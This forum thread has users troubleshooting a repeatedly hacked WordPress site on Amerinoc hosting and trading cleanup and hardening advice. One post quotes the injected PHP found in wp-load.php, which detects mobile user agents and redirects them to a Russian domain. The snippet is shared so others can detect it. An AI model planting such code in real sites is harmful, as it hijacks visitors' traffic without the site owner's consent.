Amerinoc and hacking vs others

[druid66]

Need advice.
my friend have wordpress site which is constantly being hacked and redirects mobile traffic to some other sites. redirect starts by altering one of wordpress core files. is it possible to put some monitor on such file to locate where this hack comes from or is it to hard to do?

obviously hes on amerinoc and seems that it isn't going to stop, how's others hosting services could deal with this, can you recommend me one that would take care of such stuff without constant need of checking your site and removing hack manually?

[shake]

I had WordPress blogs on Amerinoc for about 2 years and never had an issue. It is more likely to be a plugin or theme that is causing the issue.

[Manfap]

Your friend needs to learn how to secure wp.
A properly configured wp install, you cannot edit the core files.

[druid66]

hack is coming back on fresh install of wp, number of plugins are tiny, plugins have positive review, site has wordfence installed on it which is not bad protection plugin, what else can we do? just looking for something we may miss..

[druid66]

and don't get me wrong - i like guys from amerinoc, they were always helpful for me and for a friend of mine, just wanna gather here some reviews from you based on your experience, how others hosting providers would deal with it? is it possible to monitor one file etc..?

[Manfap]

Free theme?

What else is on the account, virtual account or dedicated?

Sometimes, there can be a virus on your pc that hits your ftp and corrupts wp installs.

[Paz]

List the plugins and themes here with version numbers - you only need one bad one and you're screwed. REvslider is a popular one to hack at the mo.

Re-installing WP isn't enough you have to sanitise all the wp- folders and check all the files, I had one hack that ran a jpg as a php - these people are very good at leaving lots of backdoors in the db and files so they can get back in.

You should also check your htaccess (post here), download the theme and look for anything in your php such as eval(xxxx and nuke those files.

If you are confident you've cleaned everything up then change the ftp password, mysql credentials and wp login and re-isntall but once these people have gotten a hold it's very difficult to keep them out.

If you wp install is only a few pages I'd delete everything in the public_html and in the db and start again with a fresh install with the same URL structure.

Fingers crossed.

[druid66]

admins are on it now will let you know results, thanks for tips guys.

new fresh install, deleted everything on server's domain folder and hack come back few days later.

theme is free but have positive reviews and is up to date, server is vps.

[MasonSquelch]

The 'Wordfence' plugin is very helpful: it scans life traffic on your site, allows you to block users, IPs, whole IP blocks; it regularly scans your WP install and detects altered files. Seems that's what your friend is looking for.

[Ferus]

Is he one of those that sets the folder security to 777?

[Miguel T]

All In One Security & Firewall.
I use that plugin

[druid66]

we discovered hack like 2 weeks back, since then theres wordfence active, it sends email that someone altered file but did this only once after 2 days file become altered again and wordfence didn't raise the alarm - i've checked file manually and noticed hack redirecting mobile traffic to some ukrainian site (earlier was china).

so i don't know what to think about wordfence it worked once so far and yes this live traffic feature, blocking ip's are awesome but for real we need to protect files from being altered and wordfence failed to send notice with it.

none folder is 777 i think.

any more comes to your mind guys, let me know.

i'll keep you posted with progress.

btw:

check your wp-load.php file, i found such code on the bottom (redirecting to russian site, on other site today i've found redirect to ukrainian one)

"
if(preg_match('/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i',$_SERVER['HTTP_USER_AGENT']) && $_COOKIE["m_"] != 1)
{
@setcookie('m_', '1', time()+3600, '/');
@header("Location: http://hvoraem-net.ru/top/top1.php");
die();}"

[NoWhErE]

I've been through the same thing.

Amerinoc isnt the problem, its your setup. Its a corrupted theme or plugin or open folder thats letting them get in.

It could also be a virus on your computer or a compromised email account/ftp that allows them to gain access.

[druid66]

already scanned my pc by few tools.
theme if different than before.
plugins.. last time there was 2 plugins and hack was back.

wonder what amerinoc guys would find.

i'm not saying it's amerinoc fault, i would like to know how others hosting companies deal with such situations. i'm interesting in finding source of the leak not to blame anyone.

[Harmon]

Quote:

Originally Posted by druid66

already scanned my pc by few tools.
theme if different than before.
plugins.. last time there was 2 plugins and hack was back.

wonder what amerinoc guys would find.

i'm not saying it's amerinoc fault, i would like to know how others hosting companies deal with such situations. i'm interesting in finding source of the leak not to blame anyone.

Amerinoc (phatservers) for well over 2 years with zero problems.

Was the theme from the WP repository? Or did you happen to download a "nulled" theme?

[druid66]

theme is from wp popular or suggested (don't remember)

[sinclair]

Quote:

Originally Posted by shake

I had WordPress blogs on Amerinoc for about 2 years and never had an issue. It is more likely to be a plugin or theme that is causing the issue.

Have been through several other several shared hosting providers..I always go back to Amerinoc.